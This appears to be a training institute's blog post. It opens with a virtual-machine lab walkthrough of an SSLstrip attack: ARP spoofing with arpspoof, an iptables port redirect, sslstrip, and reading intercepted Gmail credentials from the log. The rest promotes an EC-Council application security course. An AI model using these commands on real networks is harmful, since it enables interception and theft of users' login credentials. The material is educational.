SSLStriping

Let us set two virtual machines, on one machine we run Windows XP (victim) and on the other machine we run Kali (Attacker). 

Before we actually target the victim machine using SSLstrip, we need to setup the entire Man in the Middle Mechanism and packet redirection / forwarding mechanism. 

We try to follow step by step method to do so :

Please note ip address of both machines and they should be kept on NAT network.

From step 1 to 4 give all commands should be given in Kali on terminal.

1. Setting up IP Forwarding: (Use in Kali)

echo 1 > /proc/sys/net/ipv4/ip_forward

2. ARP MITM attack between Victim (Windows XP ) and Gateway:

arpspoof -i eth0 -t 192.168.1.6 192.168.1.1 

3. Setting up port redirection using Iptables from port 80 to port 10000

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

4. Start the SSLstrip tool and make it listen to port 10000 (default anyways)

sslstrip –l 10000

5. In Windows Xp login to gmail and enter the credential. (Observe that any https site is changed to http)

6. To check in Kali give the command

Cat sslstrip.log

7. We can see the credential in sslstrip.log file.

WOW !! AMAZING..... if you want to try live you can use bootable kali.

Hope you enjoyed sslstrip with kali...

By GEETA SINGH

CAST-613 Advanced Application Security from EC-Council

CAST-613 is a well known Global certification from EC-Council.

Hardening your own Corporate Web App/Web Site

We normally focus and secure all the devices connected in our network.
We continously monitor the traffic generated in/out of the network and try doing regular VA /PT by auditing and patching the vulnerability.

BUT we forget to pay attention towards Application-level attacks.
It is necessary that we secure our Application and provide secure code and make tough for hackers to get inside the Application.
This will enable us to protect our information present in the database which should not be exposed.

So here comes CAST-613 Advance Application Security course in India.
QUIK is the first Institute to take initiative to create more awareness and do hard code manual testing Vs. Automated testing and path towards the secure data by providing good education.

CAST-613 is different because we have 3 sites hosted on Amazon
One is Vulnerable site , Second is Secure site and third is attacker site.
WOW........Until unless you do the labs .....U cannot feel it.

OWASP TOP 10 and TOP 25 ERRORS are very important to map with PCI-DSS controls.
 
Introducing the vulnerable website, monitoring and composing requests using a common proxy like Fiddler, Paros or Burp Suite. Modifying requests and responses in Fiddler to change what goes out and what comes in before Browser Renders it.

We need to understand XSS,SQL inj ,CSRF , Clickjacking attacks which makes hacker very easy to spoil the site and insert malicious code.

So. BE SECURE......SECURE CODE.

HOPE YOU ALL ENJOY READING.........This is my first Blog on demand of my students and will keep writing on lots of topics.

Thanks all to my students who have encouraged me for writing....


Geeta Singh

CEH , ECSA, CHFI , .NET Security from ECCouncil

QUIK, is the ATC (Accredited Training Center) of world renowned organization EC Council. EC Council is the world leader in the Ethical hacking, penetration testing and Cyber Forensic courses. Their clientele includes reputed name as US Defence forces, FBI, CIA, NSA, UK Defence forces, WIPRO, IBM, TCS, Infosys, KPMG, Microsoft, Checkpoint, McAfee, Symantec ---and many more

QUIK has the best pool of faculties and looks forward to increasing the number of qualified trainers. Our trainers carry a combined experience of over 50 years and are experts in their domain. They are certified on MCT, CEH, CCNA, MCSE, MCTS, Java, C++, Oracle, VB, MCITP and many more. This is the reason why we are able to deliver end to end IT training solutions. QUIK takes pride in its list of professionals whom they have trained on various courses. They include add Maharashtra Police, IBM, Kodak, e-Clarx, WIPRO, Symantec, McAfee, Cognizant, Reliance, Sutherland Global, HSBC Bank, ICICI Bank, LIC, UHDE, …..To name a few

Today, in a very short span of time QUIK has quik-ly become an institute of repute and respect. We have conducted batches for CEH, ECSA, ECSS, ENSA, MCITP, CCNA, Software for large number of students/professionals. The passing percentage is 100%. We have one of the best facilities and infrastructure available to conduct various courses. With its proximity to the Thane Railway station, Thane bus stand and state transport bus depot, it makes QUIK on of the best accessible IT Training institutes in Mumbai/Navi Mumbai/Thane.